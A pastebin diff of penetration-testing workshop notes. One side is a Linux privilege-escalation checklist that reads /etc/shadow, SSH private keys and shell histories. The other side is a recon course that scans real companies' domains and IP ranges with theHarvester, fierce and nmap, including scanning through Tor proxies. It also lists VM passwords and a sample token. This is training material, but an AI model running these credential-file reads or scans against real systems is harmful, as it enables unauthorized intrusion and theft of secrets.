SHOW:
|
|
- or go back to the newest paste.
1 | - | ############################## |
1 | + | ################################## |
2 | - | # Linux For InfoSec Pros # |
2 | + | # Scripting For InfoSec Pros # |
3 | - | # By Joe McCray # |
3 | + | # By Joe McCray # |
4 | - | ############################## |
4 | + | ################################## |
5 | ||
6 | - | Here is the download link for the video of the morning session: |
6 | + | |
7 | - | https://s3.amazonaws.com/StrategicSec-Videos/_2015_4_18_rec-lw-us-9_233534_recording.mp4 |
7 | + | |
8 | ########## | |
9 | - | Here is the download link for the video of the afternoon session: |
9 | + | |
10 | - | https://s3.amazonaws.com/StrategicSec-Videos/_2015_4_18_rec-lw-us-4_233632_recording.mp4 |
10 | + | |
11 | - Although you can get the VM to run in VirtualBox, I will not be supporting this configuration for this class. | |
12 | ||
13 | ||
14 | ########################## | |
15 | # Download the attack VM # | |
16 | ########################## | |
17 | - | - For this workshop you'll need the latest version of VMWare Workstation (Windows), Fusion (Mac), or Player. |
17 | + | https://s3.amazonaws.com/infosecaddictsvirtualmachines/InfoSecAddictsVM.zip |
18 | user: infosecaddicts | |
19 | - | - A 30-day trial of Workstation 11 can be downloaded from here: |
19 | + | pass: infosecaddicts |
20 | - | - https://my.vmware.com/web/vmware/info/slug/desktop_end_user_computing/vmware_workstation/11_0 |
20 | + | |
21 | ||
22 | - | - A 30-day trial of Fusion 7 can be downloaded from here: |
22 | + | |
23 | - | - https://my.vmware.com/web/vmware/info/slug/desktop_end_user_computing/vmware_fusion/7_0 |
23 | + | |
24 | ||
25 | - | - The newest version of VMWare Player can be downloaded from here: |
25 | + | |
26 | - | - https://my.vmware.com/web/vmware/free#desktop_end_user_computing/vmware_player/7_0 |
26 | + | |
27 | ######################################## | |
28 | # Boot up the StrategicSec Ubuntu host # | |
29 | # You can also boot up the Win7 as well# | |
30 | ######################################## | |
31 | ||
32 | - Log in to your Ubuntu host with the following credentials: | |
33 | user: strategicsec | |
34 | pass: strategicsec | |
35 | - | https://s3.amazonaws.com/StrategicSec-VMs/StrategicsecUbuntu14.zip |
35 | + | |
36 | - | user: strategicsec |
36 | + | |
37 | - | pass: strategicsec |
37 | + | |
38 | - I prefer to use Putty to SSH into my Ubuntu host on pentests and I'll be teaching this class in the same manner that I do pentests. | |
39 | - You can download Putty from here: | |
40 | - http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe | |
41 | ||
42 | ||
43 | - For the purpose of this workshop 192.168.230.128 is my Ubuntu IP address so anytime you see that IP you'll know that's my Ubuntu host | |
44 | ||
45 | ||
46 | Email Harvesting | |
47 | ---------------- | |
48 | ||
49 | cd ~/toolz/ | |
50 | ||
51 | rm -rf theharvester-read-only/ | |
52 | ||
53 | sudo apt install -y python-pyasn1 python-pyasn1-modules git vim nmap openssh-server proxychains git-core curl zlib1g-dev build-essential libssl-dev libreadline-dev libyaml-dev libsqlite3-dev sqlite3 libxml2-dev libxslt1-dev libcurl4-openssl-dev python-software-properties libffi-dev | |
54 | strategicsec | |
55 | ||
56 | pip install requests | |
57 | ||
58 | git clone https://github.com/laramies/theHarvester.git | |
59 | ||
60 | cd theHarvester/ | |
61 | ||
62 | python theHarvester.py | |
63 | ||
64 | python theHarvester.py -d motorola.com -l 50 -b google | |
65 | - | # Basic Linux Commands # |
65 | + | |
66 | python theHarvester.py -d motorola.com -l 50 -b bing | |
67 | ||
68 | - | pwd |
68 | + | python theHarvester.py -d motorola.com -l 50 -b linkedin |
69 | ||
70 | - | whereis pwd |
70 | + | python theHarvester.py -d motorola.com -l 50 -b pgp |
71 | ||
72 | - | which pwd |
72 | + | |
73 | ||
74 | - | sudo find / -name pwd |
74 | + | |
75 | ||
76 | - | /bin/pwd |
76 | + | File Meta-Data Harvesting |
77 | ------------------------- | |
78 | - | mkdir test |
78 | + | |
79 | ||
80 | - | cd test |
80 | + | sudo apt-get install -y python-pip |
81 | strategicsec | |
82 | - | touch one two three |
82 | + | |
83 | pip install --upgrade pip | |
84 | - | ls -l t (without pressing the Enter key, press the Tab key twice. What happens?) |
84 | + | |
85 | pip install google | |
86 | - | h (and again without pressing the Enter key, press the Tab key twice. What happens?) |
86 | + | |
87 | ||
88 | - | Press the 'Up arrow key' (What happens?) |
88 | + | git clone https://github.com/opsdisk/metagoofil.git |
89 | ||
90 | - | Press 'Ctrl-A' (What happens?) |
90 | + | cd metagoofil/ |
91 | ||
92 | ||
93 | python metagoofil.py -d motorola.com -t doc,pdf -l 100 -n 3 -o motorolafiles | |
94 | - | clear (What happens?) |
94 | + | |
95 | sudo apt install libimage-exiftool-perl | |
96 | - | echo one > one |
96 | + | |
97 | ||
98 | - | cat one (What happens?) |
98 | + | cd motorolafiles |
99 | ||
100 | - | man cat (What happens?) |
100 | + | exiftool -r *.doc | egrep -i "Author|Creator|Email|Producer|Template" | sort -u |
101 | - | q |
101 | + | |
102 | ||
103 | - | cat two |
103 | + | |
104 | python metagoofil.py -d [domain name] -t doc,pdf -l 100 -n 3 -o motorolafiles | |
105 | - | cat one > two |
105 | + | Whereas: |
106 | ||
107 | - | cat two |
107 | + | -d : I used another domain name aside from Google.com to make it work |
108 | -t : I asked for the program to search two types of public documents whuch are doc and pdf files | |
109 | - | cat one two > three |
109 | + | -l : I limited the search result to 100 to make the process faster |
110 | -n : I limited the downloads (files that are going to be downloaded to get their metadatas extracted) to only 3 to make the process faster | |
111 | - | cat three |
111 | + | -o : I directed the result of the compilation t motorolafiles, which is a file located inside the metagoofil directory (~/toolz/metagoofil/motorolafiles) |
112 | -f : Save the html links to html_links_<TIMESTAMP>.txt file | |
113 | - | echo four >> three |
113 | + | |
114 | ||
115 | - | cat three (What happens?) |
115 | + | |
116 | ||
117 | - | wc -l three |
117 | + | |
118 | ||
119 | - | man wc |
119 | + | Github Info Harvesting |
120 | - | q |
120 | + | ---------------------- |
121 | cd ~/toolz/ | |
122 | - | cat three | grep four |
122 | + | |
123 | sudo pip install gitem | |
124 | - | cat three | grep one |
124 | + | |
125 | ||
126 | - | man grep |
126 | + | |
127 | - | q |
127 | + | gitem organization facebook |
128 | ||
129 | ||
130 | - | sudo grep eth[01] /etc/* (What happens?) |
130 | + | gitem repository facebook react |
131 | ||
132 | - | cat /etc/iftab |
132 | + | |
133 | gitem --processes 4 user zpao | |
134 | ||
135 | - | man ps |
135 | + | You'll probably get a message that says "Your API requests are being rate-limited" |
136 | - | q |
136 | + | |
137 | ||
138 | - | ps |
138 | + | You can create an Oauth token using the link below: |
139 | Reference: | |
140 | - | ps aux |
140 | + | https://help.github.com/articles/creating-an-access-token-for-command-line-use/ |
141 | ||
142 | - | ps aux | less |
142 | + | |
143 | gitem -o 123f45672972c18ea0f42fc70bc8c5172b96d890 --processes 4 user zpao | |
144 | - | Press the 'Up arrow key' (What happens?) |
144 | + | You'll have to use your own Oauth token |
145 | ||
146 | - | Press the 'Down arrow key' (What happens?) |
146 | + | |
147 | - | q |
147 | + | |
148 | ||
149 | - | top |
149 | + | Network Topology Enumeration |
150 | ---------------------------- | |
151 | ||
152 | - | ######################################################################### |
152 | + | |
153 | - | # What kind of Linux am I on and how can I find out? # |
153 | + | |
154 | - | # Great reference: # |
154 | + | wget https://raw.githubusercontent.com/leonteale/pentestpackage/master/gxfr.py |
155 | - | # https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/ # |
155 | + | |
156 | - | ######################################################################### |
156 | + | python gxfr.py --bxfr --dns-lookup -o |
157 | - | What’s the distribution type? What version? |
157 | + | motorola.com |
158 | - | ------------------------------------------- |
158 | + | [ press enter ] |
159 | - | cat /etc/issue |
159 | + | cw1kxyUgMdkECBNMb1fGqKJ9sC1lznaR20fPJeIt45Y= |
160 | - | cat /etc/*-release |
160 | + | |
161 | - | cat /etc/lsb-release # Debian based |
161 | + | |
162 | - | cat /etc/redhat-release # Redhat based |
162 | + | |
163 | ||
164 | cd ~/toolz/ | |
165 | ||
166 | - | What’s the kernel version? Is it 64-bit? |
166 | + | wget https://dl.packetstormsecurity.net/UNIX/scanners/blindcrawl.pl |
167 | - | ------------------------------------------- |
167 | + | |
168 | - | cat /proc/version |
168 | + | |
169 | - | uname -a |
169 | + | |
170 | - | uname -mrs |
170 | + | |
171 | - | rpm -q kernel |
171 | + | |
172 | - | dmesg | grep Linux |
172 | + | |
173 | - | ls /boot | grep vmlinuz- |
173 | + | |
174 | rm -rf fierce2/ | |
175 | ||
176 | git clone https://github.com/mschwager/fierce.git | |
177 | - | What can be learnt from the environmental variables? |
177 | + | |
178 | - | ---------------------------------------------------- |
178 | + | cd fierce |
179 | - | cat /etc/profile |
179 | + | |
180 | - | cat /etc/bashrc |
180 | + | sudo apt-get install -y python3-pip |
181 | - | cat ~/.bash_profile |
181 | + | strategicsec |
182 | - | cat ~/.bashrc |
182 | + | |
183 | - | cat ~/.bash_logout |
183 | + | sudo pip3 install -r requirements.txt |
184 | - | env |
184 | + | |
185 | - | set |
185 | + | python3 fierce.py -h |
186 | ||
187 | python3 fierce.py --domain motorola.com --subdomains accounts admin ads | |
188 | - | What services are running? Which service has which user privilege? |
188 | + | Traverse IPs near discovered domains to search for contiguous blocks with the --traverse flag: |
189 | - | ------------------------------------------------------------------ |
189 | + | |
190 | - | ps aux |
190 | + | python3 fierce.py --domain facebook.com --subdomains admin --traverse 10 |
191 | - | ps -ef |
191 | + | |
192 | - | top |
192 | + | |
193 | - | cat /etc/services |
193 | + | Limit nearby IP traversal to certain domains with the --search flag: |
194 | ||
195 | python3 fierce.py --domain facebook.com --subdomains admin --search fb.com fb.net | |
196 | - | Which service(s) are been running by root? Of these services, which are vulnerable - it’s worth a double check! |
196 | + | |
197 | - | --------------------------------------------------------------------------------------------------------------- |
197 | + | |
198 | - | ps aux | grep root |
198 | + | Attempt an HTTP connection on domains discovered with the --connect flag: |
199 | - | ps -ef | grep root |
199 | + | |
200 | python3 fierce.py --domain stackoverflow.com --subdomains mail --connect | |
201 | ||
202 | ||
203 | - | What applications are installed? What version are they? Are they currently running? |
203 | + | |
204 | - | ------------------------------------------------------------------------------------ |
204 | + | |
205 | - | ls -alh /usr/bin/ |
205 | + | |
206 | - | ls -alh /sbin/ |
206 | + | Another good way to find servers |
207 | - | dpkg -l |
207 | + | -------------------------------- |
208 | - | dpkg --get-selections | grep -v deinstall |
208 | + | |
209 | - | rpm -qa |
209 | + | |
210 | - | ls -alh /var/cache/apt/archives |
210 | + | wget --no-check-certificate https://raw.githubusercontent.com/BenDrysdale/ipcrawl/master/ipcrawl.c |
211 | - | ls -alh /var/cache/yum/ |
211 | + | |
212 | gcc ipcrawl.c -o ipcrawl | |
213 | ||
214 | - | Any of the service(s) settings misconfigured? Are any (vulnerable) plugins attached? |
214 | + | chmod 777 ipcrawl |
215 | - | ------------------------------------------------------------------------------------ |
215 | + | |
216 | - | cat /etc/syslog.conf |
216 | + | ./ipcrawl 148.87.1.1 148.87.1.254 (DNS forward lookup against an IP range) |
217 | - | cat /etc/chttp.conf |
217 | + | |
218 | - | cat /etc/lighttpd.conf |
218 | + | |
219 | - | cat /etc/cups/cupsd.conf |
219 | + | |
220 | - | cat /etc/inetd.conf |
220 | + | |
221 | - | cat /etc/apache2/apache2.conf |
221 | + | Check for Load Balancers |
222 | - | cat /etc/my.conf |
222 | + | |
223 | - | cat /etc/httpd/conf/httpd.conf |
223 | + | Here are some command-line options to use for identifying load balancers: |
224 | - | cat /opt/lampp/etc/httpd.conf |
224 | + | |
225 | - | ls -aRl /etc/ | awk '$1 ~ /^.*r.*/ |
225 | + | dig microsoft.com |
226 | ||
227 | cd ~/toolz | |
228 | wget https://raw.githubusercontent.com/craig/ge.mine.nu/master/lbd/lbd.sh | |
229 | - | What jobs are scheduled? |
229 | + | chmod +x lbd.sh |
230 | ./lbd.sh microsoft.com | |
231 | - | crontab -l |
231 | + | |
232 | - | ls -alh /var/spool/cron |
232 | + | |
233 | - | ls -al /etc/ | grep cron |
233 | + | git clone https://github.com/jmbr/halberd.git |
234 | - | ls -al /etc/cron* |
234 | + | cd halberd |
235 | - | cat /etc/cron* |
235 | + | |
236 | - | cat /etc/at.allow |
236 | + | |
237 | - | cat /etc/at.deny |
237 | + | |
238 | - | cat /etc/cron.allow |
238 | + | |
239 | - | cat /etc/cron.deny |
239 | + | |
240 | - | cat /etc/crontab |
240 | + | |
241 | - | cat /etc/anacrontab |
241 | + | |
242 | - | cat /var/spool/cron/crontabs/root |
242 | + | |
243 | Test for Web Application Firewalls (WAFs) | |
244 | ----------------------------------------- | |
245 | - | Any plain text usernames and/or passwords? |
245 | + | pip install wafw00f |
246 | - | ------------------------------------------ |
246 | + | |
247 | - | grep -i user [filename] |
247 | + | wafw00f http://strategicsec.com |
248 | - | grep -i pass [filename] |
248 | + | |
249 | - | grep -C 5 "password" [filename] |
249 | + | wafw00f http://oracle.com |
250 | - | find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password" # Search for Joomla passwords |
250 | + | |
251 | ||
252 | sudo nmap -p 80 --script http-waf-detect.nse strategicsec.com | |
253 | - | What NIC(s) does the system have? Is it connected to another network? |
253 | + | |
254 | - | --------------------------------------------------------------------- |
254 | + | |
255 | - | /sbin/ifconfig -a |
255 | + | |
256 | - | cat /etc/network/interfaces |
256 | + | |
257 | - | cat /etc/sysconfig/network |
257 | + | |
258 | ||
259 | ||
260 | - | What are the network configuration settings? What can you find out about this network? DHCP server? DNS server? Gateway? |
260 | + | |
261 | - | ------------------------------------------------------------------------------------------------------------------------ |
261 | + | |
262 | - | cat /etc/resolv.conf |
262 | + | |
263 | - | cat /etc/sysconfig/network |
263 | + | |
264 | - | cat /etc/networks |
264 | + | Recon-NG (Metasploit for Recon): |
265 | - | iptables -L |
265 | + | -------------------------------- |
266 | - | hostname |
266 | + | |
267 | - | dnsdomainname |
267 | + | |
268 | sudo apt-get install -y git python-pip python-dnspython python-mechanize python-slowaes python-xlsxwriter python-jsonrpclib python-lxml | |
269 | - | What other users & hosts are communicating with the system? |
269 | + | strategicsec |
270 | - | ----------------------------------------------------------- |
270 | + | |
271 | - | lsof -i |
271 | + | sudo pip install dicttoxml |
272 | - | lsof -i :80 |
272 | + | strategicsec |
273 | - | grep 80 /etc/services |
273 | + | |
274 | - | netstat -antup |
274 | + | |
275 | - | netstat -antpx |
275 | + | |
276 | - | netstat -tulpn |
276 | + | git clone https://LaNMaSteR53@bitbucket.org/LaNMaSteR53/recon-ng.git |
277 | - | chkconfig --list |
277 | + | cd recon-ng |
278 | - | chkconfig --list | grep 3:on |
278 | + | pip install PyPDF2 |
279 | - | last |
279 | + | sudo pip install olefile |
280 | - | w |
280 | + | strategicsec |
281 | ./recon-ng | |
282 | ||
283 | ||
284 | - | Whats cached? IP and/or MAC addresses |
284 | + | |
285 | At the prompt, let's type help in order to look at the commands we can use in Recon-ng. | |
286 | - | arp -e |
286 | + | |
287 | - | route |
287 | + | recon-ng > help |
288 | - | /sbin/route -nee |
288 | + | |
289 | ||
290 | Note that many of these commands are nearly identical to Metasploit including back, set, use, search, show, and unset. | |
291 | - | Who are you? Who is logged in? Who has been logged in? Who else is there? Who can do what? |
291 | + | |
292 | - | ------------------------------------------------------------------------------------------ |
292 | + | recon-ng > [ TAB ] [ TAB ] |
293 | - | id |
293 | + | |
294 | - | who |
294 | + | |
295 | - | w |
295 | + | |
296 | - | last |
296 | + | To see all the modules in Recon-ng, we can type: |
297 | - | cat /etc/passwd | cut -d: # List of users |
297 | + | |
298 | - | grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}' # List of super users |
298 | + | recon-ng > show [ TAB ] [ TAB ] |
299 | - | awk -F: '($3 == "0") {print}' /etc/passwd # List of super users |
299 | + | |
300 | - | cat /etc/sudoers |
300 | + | |
301 | - | sudo -l |
301 | + | |
302 | Ok, let's drive this thing.... | |
303 | ||
304 | recon-ng > show banner | |
305 | - | What sensitive files can be found? |
305 | + | |
306 | - | ---------------------------------- |
306 | + | recon-ng > show companies |
307 | - | cat /etc/passwd |
307 | + | |
308 | - | cat /etc/group |
308 | + | recon-ng > show contacts |
309 | - | cat /etc/shadow |
309 | + | |
310 | - | ls -alh /var/mail/ |
310 | + | recon-ng > show credentials |
311 | ||
312 | recon-ng > show dashboard | |
313 | ||
314 | - | Anything “interesting” in the home directorie(s)? If it’s possible to access |
314 | + | recon-ng > show domains |
315 | - | ---------------------------------------------------------------------------- |
315 | + | |
316 | - | ls -ahlR /root/ |
316 | + | recon-ng > show hosts |
317 | - | ls -ahlR /home/ |
317 | + | |
318 | recon-ng > show keys | |
319 | ||
320 | - | Are there any passwords in; scripts, databases, configuration files or log files? Default paths and locations for passwords |
320 | + | recon-ng > show leaks |
321 | - | --------------------------------------------------------------------------------------------------------------------------- |
321 | + | |
322 | - | cat /var/apache2/config.inc |
322 | + | recon-ng > show locations |
323 | - | cat /var/lib/mysql/mysql/user.MYD |
323 | + | |
324 | - | cat /root/anaconda-ks.cfg |
324 | + | recon-ng > show modules |
325 | ||
326 | recon-ng > show netblocks | |
327 | - | What has the user being doing? Is there any password in plain text? What have they been edting? |
327 | + | |
328 | - | ----------------------------------------------------------------------------------------------- |
328 | + | recon-ng > show options |
329 | - | cat ~/.bash_history |
329 | + | |
330 | - | cat ~/.nano_history |
330 | + | recon-ng > show ports |
331 | - | cat ~/.atftp_history |
331 | + | |
332 | - | cat ~/.mysql_history |
332 | + | recon-ng > show profiles |
333 | - | cat ~/.php_history |
333 | + | |
334 | recon-ng > show pushpins | |
335 | ||
336 | recon-ng > show repositories | |
337 | - | What user information can be found? |
337 | + | |
338 | recon-ng > show schema | |
339 | - | cat ~/.bashrc |
339 | + | |
340 | - | cat ~/.profile |
340 | + | recon-ng > show vulnerabilities |
341 | - | cat /var/mail/root |
341 | + | |
342 | - | cat /var/spool/mail/root |
342 | + | recon-ng > show workspaces |
343 | ||
344 | ||
345 | - | Can private-key information be found? |
345 | + | |
346 | ||
347 | - | cat ~/.ssh/authorized_keys |
347 | + | |
348 | - | cat ~/.ssh/identity.pub |
348 | + | When you have found a module that you would like to try the process is fairly straight forward. |
349 | - | cat ~/.ssh/identity |
349 | + | |
350 | - | cat ~/.ssh/id_rsa.pub |
350 | + | Type, “use [Modulename]” to use the module |
351 | - | cat ~/.ssh/id_rsa |
351 | + | |
352 | - | cat ~/.ssh/id_dsa.pub |
352 | + | Type, “show info” to view information about the module |
353 | - | cat ~/.ssh/id_dsa |
353 | + | |
354 | - | cat /etc/ssh/ssh_config |
354 | + | And then, “show options” to see what variables can be set |
355 | - | cat /etc/ssh/sshd_config |
355 | + | |
356 | - | cat /etc/ssh/ssh_host_dsa_key.pub |
356 | + | Set the option variables with “set [variable]” |
357 | - | cat /etc/ssh/ssh_host_dsa_key |
357 | + | |
358 | - | cat /etc/ssh/ssh_host_rsa_key.pub |
358 | + | Finally, type “run” to execute the module |
359 | - | cat /etc/ssh/ssh_host_rsa_key |
359 | + | |
360 | - | cat /etc/ssh/ssh_host_key.pub |
360 | + | |
361 | - | cat /etc/ssh/ssh_host_key |
361 | + | ********************************** Begin Day 1 Homework Part 1 ********************************** |
362 | NOTE: Take screenshots of your performing all of the commands we've learned so far | |
363 | ||
364 | - | Any settings/files (hidden) on website? Any settings file with database information? |
364 | + | |
365 | - | ------------------------------------------------------------------------------------ |
365 | + | You must create a MS WORD document titled 'FirstName-LastName-Scripting-For-InfoSec-Day1-Basic-Linux-Pentest-Commands.docx' (ex: Joseph-McCray-Scripting-For-InfoSec-Day1-Basic-Linux-Pentest-Commands.docx). |
366 | - | ls -alhR /var/www/ |
366 | + | |
367 | - | ls -alhR /srv/www/htdocs/ |
367 | + | You must spell you name EXACTLY as you want it spelled on your class certificate. |
368 | - | ls -alhR /usr/local/www/apache22/data/ |
368 | + | |
369 | - | ls -alhR /opt/lampp/htdocs/ |
369 | + | IMPORTANT NOTE: |
370 | - | ls -alhR /var/www/html/ |
370 | + | Your homework must be submitted via email to both (joe@strategicsec.com and gayane@strategicsec.com) by Sunday January 29th at midnight EST. |
371 | ||
372 | ||
373 | - | Is there anything in the log file(s) (Could help with “Local File Includes”!) |
373 | + | ********************************** End Day 1 Homework Part 1 ********************************** |
374 | - | ----------------------------------------------------------------------------- |
374 | + | |
375 | - | cat /etc/httpd/logs/access_log |
375 | + | |
376 | - | cat /etc/httpd/logs/access.log |
376 | + | |
377 | - | cat /etc/httpd/logs/error_log |
377 | + | ********************************** Begin Day 1 Homework Part 2 ********************************** |
378 | - | cat /etc/httpd/logs/error.log |
378 | + | NOTE: THIS IS AN ABSOLUTE REQUIREMENT FOR YOUR CPE CREDITS |
379 | - | cat /var/log/apache2/access_log |
379 | + | |
380 | - | cat /var/log/apache2/access.log |
380 | + | |
381 | - | cat /var/log/apache2/error_log |
381 | + | You must take screenshots of the process of you registering at least 5 API keys, as well as screenshots of you using at least 10 Recon-NG modules against a target company. |
382 | - | cat /var/log/apache2/error.log |
382 | + | |
383 | - | cat /var/log/apache/access_log |
383 | + | |
384 | - | cat /var/log/apache/access.log |
384 | + | You must create a MS WORD document titled 'FirstName-LastName-Scripting-For-InfoSec-Day1-Recon-NG.docx' (ex: Joseph-McCray--Scripting-For-InfoSec-Day1-Recon-NG.docx). |
385 | - | cat /var/log/auth.log |
385 | + | |
386 | - | cat /var/log/chttp.log |
386 | + | You must spell you name EXACTLY as you want it spelled on your class certificate. |
387 | - | cat /var/log/cups/error_log |
387 | + | |
388 | - | cat /var/log/dpkg.log |
388 | + | |
389 | - | cat /var/log/faillog |
389 | + | Reference links: |
390 | - | cat /var/log/httpd/access_log |
390 | + | http://null-byte.wonderhowto.com/how-to/hack-like-pro-reconnaissance-with-recon-ng-part-1-getting-started-0169854/ |
391 | - | cat /var/log/httpd/access.log |
391 | + | http://resources.infosecinstitute.com/basic-updated-guide-to-recon-ng-plus-new-modules-rundown/ |
392 | - | cat /var/log/httpd/error_log |
392 | + | |
393 | - | cat /var/log/httpd/error.log |
393 | + | IMPORTANT NOTE: |
394 | - | cat /var/log/lastlog |
394 | + | Your homework must be submitted via email to both (joe@strategicsec.com and gayane@strategicsec.com) by Sunday January 29th at midnight EST |
395 | - | cat /var/log/lighttpd/access.log |
395 | + | |
396 | - | cat /var/log/lighttpd/error.log |
396 | + | ********************************** End Day 1 Homework Part 2 ********************************** |
397 | - | cat /var/log/lighttpd/lighttpd.access.log |
397 | + | |
398 | - | cat /var/log/lighttpd/lighttpd.error.log |
398 | + | |
399 | - | cat /var/log/messages |
399 | + | |
400 | - | cat /var/log/secure |
400 | + | |
401 | - | cat /var/log/syslog |
401 | + | |
402 | - | cat /var/log/wtmp |
402 | + | # Scanning Methodology # |
403 | - | cat /var/log/xferlog |
403 | + | |
404 | - | cat /var/log/yum.log |
404 | + | |
405 | - | cat /var/run/utmp |
405 | + | - Ping Sweep |
406 | - | cat /var/webmin/miniserv.log |
406 | + | What's alive? |
407 | - | cat /var/www/logs/access_log |
407 | + | ------------ |
408 | - | cat /var/www/logs/access.log |
408 | + | sudo nmap -sP 157.166.226.* |
409 | - | ls -alh /var/lib/dhcp3/ |
409 | + | |
410 | - | ls -alh /var/log/postgresql/ |
410 | + | |
411 | - | ls -alh /var/log/proftpd/ |
411 | + | -if -SP yields no results try: |
412 | - | ls -alh /var/log/samba/ |
412 | + | sudo nmap -sL 157.166.226.* |
413 | strategicsec | |
414 | - | Note: auth.log, boot, btmp, daemon.log, debug, dmesg, kern.log, mail.info, mail.log, mail.warn, messages, syslog, udev, wtmp |
414 | + | |
415 | - Port Scan | |
416 | What's where? | |
417 | - | ########################### |
417 | + | ------------ |
418 | - | # Target IP Determination # |
418 | + | sudo nmap -sS 162.243.126.247 |
419 | - | ########################### |
419 | + | |
420 | - | - This portion starts the actual workshop content |
420 | + | |
421 | - | - Zone Transfer fails on most domains, but here is an example of one that works: |
421 | + | |
422 | - | dig axfr heartinternet.co.uk @ns.heartinternet.co.uk |
422 | + | - Bannergrab/Version Query |
423 | What versions of software are running | |
424 | ------------------------------------- | |
425 | - | - Usually you will need to do a DNS brute-force with something like blindcrawl or fierce |
425 | + | sudo nmap -sV 162.243.126.247 |
426 | strategicsec | |
427 | - | Look up the IP addresses at: |
427 | + | |
428 | - | http://www.networksolutions.com/whois/index.jsp |
428 | + | |
429 | - Vulnerability Research | |
430 | Lookup the banner versions for public exploits | |
431 | - | - Note: If you are on a different machine and need to download blindcrawl can you download it this way: |
431 | + | ---------------------------------------------- |
432 | - | wget dl.packetstormsecurity.net/UNIX/scanners/blindcrawl.pl |
432 | + | http://exploit-db.com |
433 | http://securityfocus.com/bid | |
434 | https://packetstormsecurity.com/files/tags/exploit/ | |
435 | ||
436 | ||
437 | - | cd ~/toolz/fierce2 |
437 | + | |
438 | - | sudo apt-get install -y cpanminus cpan-listchanges cpanoutdated libappconfig-perl libyaml-appconfig-perl libnetaddr-ip-perl libnet-cidr-perl vim subversion |
438 | + | ####################################################### |
439 | - | strategicsec |
439 | + | # Day 1: 3rd Party Scanning, and scanning via proxies # |
440 | ####################################################### | |
441 | ||
442 | - | - Note: Only run this 'svn co' command below if you are NOT on the strategicsec VM: |
442 | + | https://www.shodan.io/ |
443 | - | svn co https://svn.assembla.com/svn/fierce/fierce2/trunk/ fierce2/ |
443 | + | |
444 | Create a FREE account and login | |
445 | ||
446 | - | cd ~/toolz/fierce2 |
446 | + | net:129.188.8.0/24 |
447 | - | wget http://search.cpan.org/CPAN/authors/id/A/AB/ABW/Template-Toolkit-2.14.tar.gz |
447 | + | |
448 | - | tar -zxvf Template-Toolkit-2.14.tar.gz |
448 | + | |
449 | - | cd Template-Toolkit-2.14/ |
449 | + | |
450 | - | perl Makefile.PL |
450 | + | cd /home/strategicsec/toolz/ |
451 | - | y |
451 | + | perl proxyfinder-0.3.pl multiproxy 3 proxies.txt <-- This takes a long time to run |
452 | - | y |
452 | + | |
453 | - | n |
453 | + | |
454 | - | y |
454 | + | |
455 | sudo vi /etc/proxychains.conf <--- Make sure that last line of the file is: socks4 127.0.0.1 9050 | |
456 | strategicsec | |
457 | ||
458 | ||
459 | ||
460 | - | sudo bash install.sh |
460 | + | |
461 | ---------------------------------------------------------------------- | |
462 | vi ~/toolz/fix-proxychains-dns.sh | |
463 | - | ./fierce |
463 | + | |
464 | #!/bin/bash | |
465 | - | ./fierce -dns motorola.com |
465 | + | # This script is called by proxychains to resolve DNS names |
466 | # DNS server used to resolve names | |
467 | # Reference: http://carnal0wnage.attackresearch.com/2013/09/changing-proxychains-hardcoded-dns.html | |
468 | DNS_SERVER=4.2.2.2 | |
469 | - | - Note: Only run these 'wget, gcc, chmod' commands below if you are NOT on the strategicsec VM: |
469 | + | |
470 | - | wget https://raw.githubusercontent.com/BenDrysdale/ipcrawl/master/ipcrawl.c |
470 | + | if [ $# = 0 ] ; then |
471 | - | gcc -o ipcrawl ipcrawl.c |
471 | + | echo " usage:" |
472 | - | chmod +x ipcrawl |
472 | + | echo " proxyresolv <hostname> " |
473 | exit | |
474 | fi | |
475 | ||
476 | - | - Here we do a forward lookup against an entire IP range. Basically take every IP in the range and see what it's hostname is |
476 | + | export LD_PRELOAD=libproxychains.so.3 |
477 | dig $1 @$DNS_SERVER +tcp | awk '/A.+[0-9]+\.[0-9]+\.[0-9]/{print $5;}' | |
478 | - | ./ipcrawl 148.87.1.1 148.87.1.254 (DNS forward lookup against an IP range) |
478 | + | ----------------------------------------------------------------------- |
479 | ||
480 | ||
481 | - | sudo nmap -sL 148.87.1.0-255 |
481 | + | sudo ntpdate pool.ntp.org |
482 | strategicsec | |
483 | ||
484 | - | sudo nmap -sL 148.87.1.0-255 | grep oracle |
484 | + | tor-resolve strategicsec.com |
485 | ||
486 | proxychains nmap -sT -p80 162.243.126.247 | |
487 | - | - Reference: http://blog.depthsecurity.com/2012/01/obtaining-hostdomain-names-through-ssl.html |
487 | + | |
488 | - | sudo nmap -p 443,444,8443,8080,8088 --script=ssl-cert --open 144.189.100.1-254 |
488 | + | proxychains nmap -sT -PN -n -sV -p 21,22,23,25,80,110,139,443,445,1433,1521,3306,3389,8080,10000 162.243.126.247 |
489 | ||
490 | - | |
490 | + | |
491 | ||
492 | ||
493 | ||
494 | - | ########################### |
494 | + | |
495 | - | # Load Balancer Detection # |
495 | + | |
496 | - | ########################### |
496 | + | |
497 | # Playing with Nmap NSE # | |
498 | - | - Here are some options to use for identifying load balancers: |
498 | + | |
499 | - | - http://toolbar.netcraft.com/site_report/ |
499 | + | |
500 | - | - Firefox LiveHTTP Headers |
500 | + | nmap -Pn -p80 --script ip-geolocation-* strategicsec.com |
501 | ||
502 | nmap -p80 --script dns-brute strategicsec.com | |
503 | - | - Here are some command-line options to use for identifying load balancers: |
503 | + | |
504 | nmap --script http-robtex-reverse-ip secore.info | |
505 | - | dig google.com |
505 | + | |
506 | nmap -Pn -p80 --script=http-headers strategicsec.com | |
507 | ||
508 | - | ./lbd-0.1.sh google.com |
508 | + | |
509 | ls /usr/share/nmap/scripts | grep http | |
510 | nmap -Pn -p80 --script=http-* strategicsec.com | |
511 | ||
512 | ||
513 | ||
514 | ######################### | |
515 | # Playing with Nmap NSE # | |
516 | ######################### | |
517 | ||
518 | nmap -Pn -p80 --script ip-geolocation-* strategicsec.com | |
519 | ||
520 | - | # Web Application Firewall Detection # |
520 | + | |
521 | ||
522 | nmap --script http-robtex-reverse-ip secore.info | |
523 | - | cd ~/toolz/wafw00f |
523 | + | |
524 | - | python wafw00f.py http://www.oracle.com |
524 | + | |
525 | - | python wafw00f.py http://www.strategicsec.com |
525 | + | |
526 | ||
527 | ls /usr/share/nmap/scripts | grep http | |
528 | nmap -Pn -p80 --script=http-* strategicsec.com | |
529 | ||
530 | ############ | |
531 | # Nmap NSE # | |
532 | - | sudo nmap -p 80 --script http-waf-detect.nse healthcare.gov |
532 | + | |
533 | ||
